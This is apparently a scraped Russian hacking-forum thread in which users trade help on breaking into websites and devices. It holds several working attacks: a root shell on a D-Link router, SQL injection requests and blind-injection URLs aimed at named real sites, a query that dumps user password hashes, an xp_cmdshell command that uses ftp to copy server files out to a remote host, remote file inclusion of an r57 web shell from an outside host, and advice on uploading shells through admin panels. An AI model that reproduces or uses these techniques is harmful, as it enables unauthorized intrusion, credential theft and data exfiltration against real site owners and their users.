Зачем? Что толку от веб-шелла то? p.s хотя можно попробовать залить cgi шелл, но не уверен. Code: Login: admin Password: NAME=DSL_2640NRU VERSION=1.0.0 BUILDTIME=Fri Mar 18 08:01:43 UTC 2011 VENDOR=D-Link Russia BUGS=<[email protected]> SUMMARY=Root filesystem image for DSL_2640NRU BOARDID=96328AVNG_N31 For help, type 'help' or '?'. DSL_2640NRU# sh BusyBox v1.00 (2011.03.18-07:59+0000) Built-in shell (msh) Enter 'help' for a list of built-in commands. # ls / VERSION data etc linuxrc opt sbin tmp var bin dev lib mnt proc sys usr webs # ls /webs/ www # ls /webs/www css favicon.ico index.cgi passw.html dlink.css fwupdate.cgi index.html scripts fastweb.cgi image info.html templates #
Post Sql Запрос для выполнения SQL инъекции: POST /register.php HTTP/1.1 Host: partners.gigagame.ru Content-Type: application/x-www-form-urlencoded Content-Length: 78 email='&passone=1&passtwo=1&lastname=1&firstname=1&midname=1&keeper=1&Submit=1 Результат работы <...> тнера</h1> <div class="contentin"> <br /> <b>Warning</b>: mysql_numrows(): supplied argument is not a valid MySQL result resource in <b>/home/cdmag/data/www/dvdshka.ru/partners/partners_ufunctions.php</b> on line <b>264</b><br /> <div align=center><FONT color=red><br>Адрес электронной почты не может быть без символа "@"<br>Вы не указали адреса своих сайтов<br>Вы не правильно указали WMR кош <...> ______________________________________________ Каким образом выполнить SQL инъекция по методу post исходя из текущих данных?
http://site.com/configuration.php-dist или в исходниках админки: http://www.site.com/administrator/ <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
Вот вопросег... есть юзер mssql (2008 r2), с xp_cmdshell. Хочу зааплоудить файлики с харда серва на фтп. Делаю так со своей машины : Start run cmd -> Code: ftp -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR Всё канает - фтп выполняет содержимое cmd.txt после подключения к ftp. Но вот если делать так : Code: exec xp_cmdshell 'c:\windows\system32\ftp.exe -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR' - канать не хочет. Пишет Code: Error opening script file \\IP_ADDR\Users\Public\cmd.txt. Error opening script file \\IP_ADDR\Users\Public\cmd.txt. NULL Transfers files to and from a computer running an FTP server service (sometimes called a daemon). Ftp can be used interactively. ............................. Подскажите, что может быть не так ? )
Движок webasyst Посмотрел видео: http://www.youtube.com/watch?v=DgXCGzRLvYY Дохожу до момента Duplicate entry for key group с помощью Как дальше выдрать хешы? Колонки U_ID U_PASSWORD
ну так вместо вывода версии (select+version()) пиши свой запрос, типа Code: select concat_ws(0x3a,u_id,u_password) from имя_таблицы_в_которой_пасс limit 0,1 очевидно же
Такой вопрос, Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок)
Скуля однозначно Code: http://britishcat.ru/articlees5354/**/and/**/1=1.html TRUE http://britishcat.ru/articlees5354/**/and/**/1=2.html FALSE http://britishcat.ru/articlees5354/**/and/**/1=1/**/group/**/by/**/1.html Крути как слепую Code: http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=5.html TRUE http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=4.html FALSE
Ничё интересного там нет... Прав на запись тоже... Code: FreeBSD cl1108.azar-a.net 8.2-RELEASE-p3 FreeBSD 8.2-RELEASE-p3 #0: 1004 ( apache ) Group: 1003 ( apache ) 5.2.17 Safe mode: OFF /home/admin/domains/gorod-dolgoprudny.ru/public_html/ drwxr-xr-x
Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?
если там только html то никак, ищи другие возможности, качалки там разные, в редакторах обычно качалка шела есть
Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю. Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки : Если я пишу любое слово после page= то показывает ошибки : Или здесь не возможен php include ? потомучто всместо слова include должно быть main ? Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок ) Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать. Спасибо.
Нашел там прикрепить фотографию к новосте, открывается страница uploadp.php, пробовал загрузил шелл, пишет unable to move file...
Там и дураку должно быть понятно, что в данном случае allow_url_include=0, а нужен allow_url_include=1
